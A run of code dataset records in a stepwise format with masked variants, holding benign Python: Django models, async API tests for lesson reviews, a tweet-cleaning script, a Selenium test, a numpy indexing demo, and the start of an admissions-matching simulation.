"step-4": "from django.db import models\n\n\nclass Professor(models.Model):\n nome = models.CharField(max_length=100)\n apelido = models.CharField(max_length=30)\n descricao = models.TextField(max_length=1000)\n\n def __str__(self):\n return self.nome\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-5": null,
"step-ids": [
2,
3,
5,
6
]
}
|
[
2,
3,
5,
6
] |
import datetime
from httpx import AsyncClient
from testing.conftest import (LESSONS_PATH, REVIEWS_PATH, pytestmark,
register_and_get_token)
class TestReview:
async def test_review_add_get(self, ac, fill_db):
# Creating users first
token = await register_and_get_token(ac)
token2 = await register_and_get_token(ac, main_user=False)
        # Not providing any lessons for review
for param in [{"lesson_id": []}, None]:
res = await ac.post(
REVIEWS_PATH, headers={"Authorization": f"Bearer {token}"}, params=param
)
assert res.status_code == 422, res.content
# Actually adding reviews
bad = [1488888, 8888888, 99999]
real = [1, 4, 8, 7]
res = await ac.post(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
params={"lesson_id": bad + real},
)
assert res.status_code == 201, res.content
resulting_reviews = res.json()
# Getting each review separately and combining them
added = []
for review_id in real:
res = await ac.get(
REVIEWS_PATH + f"/{review_id}",
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 200, res.content
for item in res.json():
added.append(item)
# Trying to access the file using as a different user
# res = await ac.get(REVIEWS_PATH + f"/{review_id}",
# headers={"Authorization": f"Bearer {token2}"},
# )
# assert res.status_code == 403, res.content
# Trying to get a non-existent item
res = await ac.get(
REVIEWS_PATH + "/50000",
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 404
func = lambda x: x.get("lesson_id")
assert sorted(resulting_reviews["added"], key=func) == sorted(added, key=func)
assert resulting_reviews["already_added"] == []
assert sorted(resulting_reviews["non_existent"]) == sorted(bad)
# Adding duplicates
res = await ac.post(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
params={"lesson_id": bad + real},
)
assert res.status_code == 201, res.content
resulting_reviews = res.json()
assert resulting_reviews["added"] == []
assert sorted(resulting_reviews["already_added"], key=func) == sorted(
added, key=func
)
assert sorted(resulting_reviews["non_existent"]) == sorted(bad)
async def test_getting_due_reviews(self, ac, mocker, fill_db):
# Creating a user first
token = await register_and_get_token(ac)
# Creating reviews for the user
to_add = [1, 4, 8, 7]
res = await ac.post(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
params={"lesson_id": to_add},
)
assert res.status_code == 201, res.content
assert res.json()["added"] != []
assert res.json()["already_added"] == []
assert res.json()["non_existent"] == []
# Getting corresponding lessons
expected_lessons = []
for lesson_id in to_add:
res = await ac.get(LESSONS_PATH + f"/{lesson_id}")
assert res.status_code == 200
expected_lessons.append(res.json())
# Getting not yet ready reviews
res = await ac.get(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 200, res.content
assert res.json() == []
# Advancing time and getting ready reviews
class FakeDatetime:
def now(self=datetime.datetime):
return datetime.datetime(year=2100, month=1, day=1)
mocker.patch("app.routers.review.datetime", FakeDatetime)
res = await ac.get(
REVIEWS_PATH,
headers={"Authorization": f"Bearer {token}"},
)
assert res.status_code == 200, res.content
func = lambda x: x.get("lesson_id")
        # TODO bring back
# assert sorted(res.json(), key=func) == sorted(expected_lessons, key=func)
# Todo check every review
# Reviewing each lesson
# Getting not yet ready reviews
# res = await ac.get(REVIEWS_PATH,
# headers={"Authorization": f"Bearer {token}"},
# )
# assert res.status_code == 200, res.content
# assert res.json() == []
|
normal
|
{
"blob_id": "3ec858c04a7622ae621bf322730b6b3ba9f4d07e",
"index": 5826,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestReview:\n\n async def test_review_add_get(self, ac, fill_db):\n token = await register_and_get_token(ac)\n token2 = await register_and_get_token(ac, main_user=False)\n for param in [{'lesson_id': []}, None]:\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params=param)\n assert res.status_code == 422, res.content\n bad = [1488888, 8888888, 99999]\n real = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n added = []\n for review_id in real:\n res = await ac.get(REVIEWS_PATH + f'/{review_id}', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 200, res.content\n for item in res.json():\n added.append(item)\n res = await ac.get(REVIEWS_PATH + '/50000', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 404\n func = lambda x: x.get('lesson_id')\n assert sorted(resulting_reviews['added'], key=func) == sorted(added,\n key=func)\n assert resulting_reviews['already_added'] == []\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n assert resulting_reviews['added'] == []\n assert sorted(resulting_reviews['already_added'], key=func) == sorted(\n added, key=func)\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n\n async def test_getting_due_reviews(self, ac, mocker, fill_db):\n token = await register_and_get_token(ac)\n to_add = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': to_add})\n assert res.status_code == 201, res.content\n assert res.json()['added'] != []\n assert res.json()['already_added'] == []\n assert res.json()['non_existent'] == []\n expected_lessons = []\n for lesson_id in to_add:\n res = await ac.get(LESSONS_PATH + f'/{lesson_id}')\n assert res.status_code == 200\n expected_lessons.append(res.json())\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n assert res.json() == []\n\n\n class FakeDatetime:\n\n def now(self=datetime.datetime):\n return datetime.datetime(year=2100, month=1, day=1)\n mocker.patch('app.routers.review.datetime', FakeDatetime)\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n func = lambda x: x.get('lesson_id')\n",
"step-3": "import datetime\nfrom httpx import AsyncClient\nfrom testing.conftest import LESSONS_PATH, REVIEWS_PATH, pytestmark, register_and_get_token\n\n\nclass TestReview:\n\n async def test_review_add_get(self, ac, fill_db):\n token = await register_and_get_token(ac)\n token2 = await register_and_get_token(ac, main_user=False)\n for param in [{'lesson_id': []}, None]:\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params=param)\n assert res.status_code == 422, res.content\n bad = [1488888, 8888888, 99999]\n real = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n added = []\n for review_id in real:\n res = await ac.get(REVIEWS_PATH + f'/{review_id}', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 200, res.content\n for item in res.json():\n added.append(item)\n res = await ac.get(REVIEWS_PATH + '/50000', headers={\n 'Authorization': f'Bearer {token}'})\n assert res.status_code == 404\n func = lambda x: x.get('lesson_id')\n assert sorted(resulting_reviews['added'], key=func) == sorted(added,\n key=func)\n assert resulting_reviews['already_added'] == []\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': bad + real})\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n assert resulting_reviews['added'] == []\n assert sorted(resulting_reviews['already_added'], key=func) == sorted(\n added, key=func)\n assert sorted(resulting_reviews['non_existent']) == sorted(bad)\n\n async def test_getting_due_reviews(self, ac, mocker, fill_db):\n token = await register_and_get_token(ac)\n to_add = [1, 4, 8, 7]\n res = await ac.post(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'}, params={'lesson_id': to_add})\n assert res.status_code == 201, res.content\n assert res.json()['added'] != []\n assert res.json()['already_added'] == []\n assert res.json()['non_existent'] == []\n expected_lessons = []\n for lesson_id in to_add:\n res = await ac.get(LESSONS_PATH + f'/{lesson_id}')\n assert res.status_code == 200\n expected_lessons.append(res.json())\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n assert res.json() == []\n\n\n class FakeDatetime:\n\n def now(self=datetime.datetime):\n return datetime.datetime(year=2100, month=1, day=1)\n mocker.patch('app.routers.review.datetime', FakeDatetime)\n res = await ac.get(REVIEWS_PATH, headers={'Authorization':\n f'Bearer {token}'})\n assert res.status_code == 200, res.content\n func = lambda x: x.get('lesson_id')\n",
"step-4": "import datetime\n\nfrom httpx import AsyncClient\n\nfrom testing.conftest import (LESSONS_PATH, REVIEWS_PATH, pytestmark,\n register_and_get_token)\n\n\nclass TestReview:\n async def test_review_add_get(self, ac, fill_db):\n\n # Creating users first\n token = await register_and_get_token(ac)\n token2 = await register_and_get_token(ac, main_user=False)\n\n # Not providing ant lessons for review\n for param in [{\"lesson_id\": []}, None]:\n res = await ac.post(\n REVIEWS_PATH, headers={\"Authorization\": f\"Bearer {token}\"}, params=param\n )\n assert res.status_code == 422, res.content\n\n # Actually adding reviews\n bad = [1488888, 8888888, 99999]\n real = [1, 4, 8, 7]\n res = await ac.post(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n params={\"lesson_id\": bad + real},\n )\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n\n # Getting each review separately and combining them\n added = []\n for review_id in real:\n res = await ac.get(\n REVIEWS_PATH + f\"/{review_id}\",\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 200, res.content\n for item in res.json():\n added.append(item)\n\n # Trying to access the file using as a different user\n # res = await ac.get(REVIEWS_PATH + f\"/{review_id}\",\n # headers={\"Authorization\": f\"Bearer {token2}\"},\n # )\n # assert res.status_code == 403, res.content\n\n # Trying to get a non-existent item\n res = await ac.get(\n REVIEWS_PATH + \"/50000\",\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 404\n\n func = lambda x: x.get(\"lesson_id\")\n assert sorted(resulting_reviews[\"added\"], key=func) == sorted(added, key=func)\n assert resulting_reviews[\"already_added\"] == []\n assert sorted(resulting_reviews[\"non_existent\"]) == sorted(bad)\n\n # Adding duplicates\n res = await ac.post(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n params={\"lesson_id\": bad + real},\n )\n assert res.status_code == 201, res.content\n resulting_reviews = res.json()\n assert resulting_reviews[\"added\"] == []\n assert sorted(resulting_reviews[\"already_added\"], key=func) == sorted(\n added, key=func\n )\n assert sorted(resulting_reviews[\"non_existent\"]) == sorted(bad)\n\n async def test_getting_due_reviews(self, ac, mocker, fill_db):\n\n # Creating a user first\n token = await register_and_get_token(ac)\n\n # Creating reviews for the user\n to_add = [1, 4, 8, 7]\n res = await ac.post(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n params={\"lesson_id\": to_add},\n )\n assert res.status_code == 201, res.content\n assert res.json()[\"added\"] != []\n assert res.json()[\"already_added\"] == []\n assert res.json()[\"non_existent\"] == []\n\n # Getting corresponding lessons\n expected_lessons = []\n for lesson_id in to_add:\n res = await ac.get(LESSONS_PATH + f\"/{lesson_id}\")\n assert res.status_code == 200\n expected_lessons.append(res.json())\n\n # Getting not yet ready reviews\n res = await ac.get(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 200, res.content\n assert res.json() == []\n\n # Advancing time and getting ready reviews\n class FakeDatetime:\n def now(self=datetime.datetime):\n return datetime.datetime(year=2100, month=1, day=1)\n\n mocker.patch(\"app.routers.review.datetime\", FakeDatetime)\n res = await ac.get(\n REVIEWS_PATH,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n assert res.status_code == 200, 
res.content\n func = lambda x: x.get(\"lesson_id\")\n #TOdo bring back\n # assert sorted(res.json(), key=func) == sorted(expected_lessons, key=func)\n\n # Todo check every review\n # Reviewing each lesson\n\n # Getting not yet ready reviews\n # res = await ac.get(REVIEWS_PATH,\n # headers={\"Authorization\": f\"Bearer {token}\"},\n # )\n # assert res.status_code == 200, res.content\n # assert res.json() == []\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import json
import sys
from os import listdir
from os.path import isfile, join
import params
def encodeText(tweet_text):
tweet_text = tweet_text.replace('\n',' ')
return str(tweet_text)
def parse_file(file_in, file_out):
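    # Read one JSON tweet per line, keep only the fields of interest,
    # and write the cleaned records to file_out.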
ptrFile_in = open(file_in, "r")
ptrFile_out = open(file_out, "w", encoding="utf-8")
cleanLines = []
for line in ptrFile_in:
cleanLine = {}
line = line.rstrip()
if line != "":
try:
decoded = json.loads(line)
cleanLine.update({"id" : decoded['id']})
cleanLine.update({"date" : decoded['created_at']})
if decoded.get('extended_tweet') is not None:
cleanLine.update({"text": encodeText(decoded['extended_tweet']['full_text'])})
else:
cleanLine.update({"text": encodeText(decoded['text'])})
cleanLine.update({"user_id" : decoded['user']['id']})
cleanLine.update({"user_name" : '@' + decoded['user']['screen_name']})
if decoded.get('place') is not None:
cleanLine.update({"location" : {"country": decoded['place']['country'], "city": decoded['place']['name']} })
else:
cleanLine.update({"location" : {} })
if decoded.get('retweeted_status') is not None:
cleanLine.update({"retweeted" : True })
if decoded.get('retweeted_status').get('extended_tweet') is not None:
cleanLine.update({"RT_text" : encodeText(decoded['retweeted_status']['extended_tweet']['full_text']) })
else:
cleanLine.update({"RT_text" : encodeText(decoded['retweeted_status']['text']) })
cleanLine.update({"RT_user_id" : decoded['retweeted_status']['user']['id'] })
cleanLine.update({"RT_user_name" : '@' + decoded['retweeted_status']['user']['screen_name'] })
else:
cleanLine.update({"retweeted" : False})
cleanLines.append(cleanLine)
except Exception as e:
print(e, " :: ", line)
ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))
ptrFile_out.close()
if __name__ == '__main__':
path_in = params.folder_path
path_out = params.clean_path
for f in listdir(path_in):
file_in = join(path_in, f)
file_out = join(path_out, f)
if isfile(file_in):
parse_file(file_in, file_out)
|
normal
|
{
"blob_id": "e3afaabc1f7f64b9189fc88dd478ed75e81f35e1",
"index": 4564,
"step-1": "<mask token>\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef encodeText(tweet_text):\n tweet_text = tweet_text.replace('\\n', ' ')\n return str(tweet_text)\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef encodeText(tweet_text):\n tweet_text = tweet_text.replace('\\n', ' ')\n return str(tweet_text)\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\nif __name__ == '__main__':\n path_in = params.folder_path\n path_out = params.clean_path\n for f in listdir(path_in):\n file_in = join(path_in, f)\n file_out = join(path_out, f)\n if isfile(file_in):\n parse_file(file_in, file_out)\n",
"step-4": "import json\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport params\n\n\ndef encodeText(tweet_text):\n tweet_text = tweet_text.replace('\\n', ' ')\n return str(tweet_text)\n\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, 'r')\n ptrFile_out = open(file_out, 'w', encoding='utf-8')\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != '':\n try:\n decoded = json.loads(line)\n cleanLine.update({'id': decoded['id']})\n cleanLine.update({'date': decoded['created_at']})\n if decoded.get('extended_tweet') is not None:\n cleanLine.update({'text': encodeText(decoded[\n 'extended_tweet']['full_text'])})\n else:\n cleanLine.update({'text': encodeText(decoded['text'])})\n cleanLine.update({'user_id': decoded['user']['id']})\n cleanLine.update({'user_name': '@' + decoded['user'][\n 'screen_name']})\n if decoded.get('place') is not None:\n cleanLine.update({'location': {'country': decoded[\n 'place']['country'], 'city': decoded['place']['name']}}\n )\n else:\n cleanLine.update({'location': {}})\n if decoded.get('retweeted_status') is not None:\n cleanLine.update({'retweeted': True})\n if decoded.get('retweeted_status').get('extended_tweet'\n ) is not None:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['extended_tweet'][\n 'full_text'])})\n else:\n cleanLine.update({'RT_text': encodeText(decoded[\n 'retweeted_status']['text'])})\n cleanLine.update({'RT_user_id': decoded[\n 'retweeted_status']['user']['id']})\n cleanLine.update({'RT_user_name': '@' + decoded[\n 'retweeted_status']['user']['screen_name']})\n else:\n cleanLine.update({'retweeted': False})\n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, ' :: ', line)\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close()\n\n\nif __name__ == '__main__':\n path_in = params.folder_path\n path_out = params.clean_path\n for f in listdir(path_in):\n file_in = join(path_in, f)\n file_out = join(path_out, f)\n if isfile(file_in):\n parse_file(file_in, file_out)\n",
"step-5": "import json\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport params\n\ndef encodeText(tweet_text): \n tweet_text = tweet_text.replace('\\n',' ') \n return str(tweet_text)\n\ndef parse_file(file_in, file_out):\n ptrFile_in = open(file_in, \"r\")\n ptrFile_out = open(file_out, \"w\", encoding=\"utf-8\")\n\n cleanLines = []\n for line in ptrFile_in:\n cleanLine = {}\n line = line.rstrip()\n if line != \"\":\n try:\n decoded = json.loads(line)\n cleanLine.update({\"id\" : decoded['id']})\n cleanLine.update({\"date\" : decoded['created_at']})\n if decoded.get('extended_tweet') is not None: \n cleanLine.update({\"text\": encodeText(decoded['extended_tweet']['full_text'])})\n else:\n cleanLine.update({\"text\": encodeText(decoded['text'])}) \n cleanLine.update({\"user_id\" : decoded['user']['id']}) \n cleanLine.update({\"user_name\" : '@' + decoded['user']['screen_name']}) \n\n if decoded.get('place') is not None: \n cleanLine.update({\"location\" : {\"country\": decoded['place']['country'], \"city\": decoded['place']['name']} }) \n else:\n cleanLine.update({\"location\" : {} })\n\n if decoded.get('retweeted_status') is not None: \n cleanLine.update({\"retweeted\" : True })\n if decoded.get('retweeted_status').get('extended_tweet') is not None:\n cleanLine.update({\"RT_text\" : encodeText(decoded['retweeted_status']['extended_tweet']['full_text']) })\n else:\n cleanLine.update({\"RT_text\" : encodeText(decoded['retweeted_status']['text']) })\n cleanLine.update({\"RT_user_id\" : decoded['retweeted_status']['user']['id'] })\n cleanLine.update({\"RT_user_name\" : '@' + decoded['retweeted_status']['user']['screen_name'] }) \n else:\n cleanLine.update({\"retweeted\" : False}) \n \n cleanLines.append(cleanLine)\n except Exception as e:\n print(e, \" :: \", line)\n\n ptrFile_out.write(json.dumps(cleanLines, ensure_ascii=False))\n ptrFile_out.close() \n\nif __name__ == '__main__':\n path_in = params.folder_path \n path_out = params.clean_path\n\n for f in listdir(path_in):\n file_in = join(path_in, f) \n file_out = join(path_out, f) \n if isfile(file_in):\n parse_file(file_in, file_out)\n\n\n \n\n \n \n \n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = "btn.btn-lg.btn-primary.btn-add-to-basket"
found_button = WebDriverWait(browser, 5).until(
EC.element_to_be_clickable((By.CLASS_NAME, btn_add))
)
assert found_button != False, 'Do not found the button of add to basket'
|
normal
|
{
"blob_id": "464be943f4fe34dda826ebada9e128f1d7d671ac",
"index": 8485,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-3": "<mask token>\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-4": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'\n found_button = WebDriverWait(browser, 5).until(EC.\n element_to_be_clickable((By.CLASS_NAME, btn_add)))\n assert found_button != False, 'Do not found the button of add to basket'\n",
"step-5": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\ndef test_guest_should_see_button_add_to_basket(browser):\n browser.get(link)\n btn_add = \"btn.btn-lg.btn-primary.btn-add-to-basket\"\n found_button = WebDriverWait(browser, 5).until(\n EC.element_to_be_clickable((By.CLASS_NAME, btn_add))\n )\n assert found_button != False, 'Do not found the button of add to basket'",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# accessing array elements rows/columns
import numpy as np
a = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])
print(a.shape) # array shape
print(a)
print('\n')
# specific array element [r,c]
# item 6
print(a[0][5])
# item 8
print(a[1][1]) # or
print(a[1][-6])
# get a specific row/specific column
print(a[1])
print(a[0])
print(a[0, :])
print(a[:, 1]) # prints second column
print('\n')
# get only the even numbers from first row [start_index:end_index:step]
print('even numbers from first row')
print(a[0, 1:8:2])
# change certain value of array
a[1, 2] = 90
print('new array is ',a)
|
normal
|
{
"blob_id": "8cc97ebe0ff7617eaf31919d40fa6c312d7b6f94",
"index": 8814,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a.shape)\nprint(a)\nprint('\\n')\nprint(a[0][5])\nprint(a[1][1])\nprint(a[1][-6])\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1])\nprint('\\n')\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\n<mask token>\nprint('new array is ', a)\n",
"step-3": "<mask token>\na = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])\nprint(a.shape)\nprint(a)\nprint('\\n')\nprint(a[0][5])\nprint(a[1][1])\nprint(a[1][-6])\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1])\nprint('\\n')\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\na[1, 2] = 90\nprint('new array is ', a)\n",
"step-4": "import numpy as np\na = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])\nprint(a.shape)\nprint(a)\nprint('\\n')\nprint(a[0][5])\nprint(a[1][1])\nprint(a[1][-6])\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1])\nprint('\\n')\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\na[1, 2] = 90\nprint('new array is ', a)\n",
"step-5": "# accessing array elements rows/columns\nimport numpy as np\n\na = np.array([[1, 2, 3, 4, 5, 6, 7], [9, 8, 7, 6, 5, 4, 3]])\nprint(a.shape) # array shape\nprint(a)\nprint('\\n')\n\n# specific array element [r,c]\n# item 6\nprint(a[0][5])\n\n# item 8\nprint(a[1][1]) # or\nprint(a[1][-6])\n\n# get a specific row/specific column\nprint(a[1])\nprint(a[0])\nprint(a[0, :])\nprint(a[:, 1]) # prints second column\nprint('\\n')\n\n# get only the even numbers from first row [start_index:end_index:step]\nprint('even numbers from first row')\nprint(a[0, 1:8:2])\n\n# change certain value of array\na[1, 2] = 90\nprint('new array is ',a)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import numpy as np
import random
import csv
import pprint
import datamake
import dafunc_H
def simulation(cnt, a, b):
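    # Repeat the run cnt times with a different random seed each time,
    # stacking the resulting student arrays before saving them.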
df, df_collist = datamake.make_df(
'/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'
)
n, m, k = datamake.stu_num()
df_stu = np.zeros((1, n + 1))
for j in range(cnt):
random.seed(48 + j)
student = datamake.make_stu(n, m, k, a, b)
#print(df_collist)
univ = datamake.univ_make(df, df_collist)
for i in range(200):
dafunc_H.da_H(student, univ, df_collist)
if j == 0:
df_stu = student[:, 0:5].T.copy()
else:
df_stuadd = student[:, 0:5].T.copy()
df_stu = np.vstack((df_stu, df_stuadd))
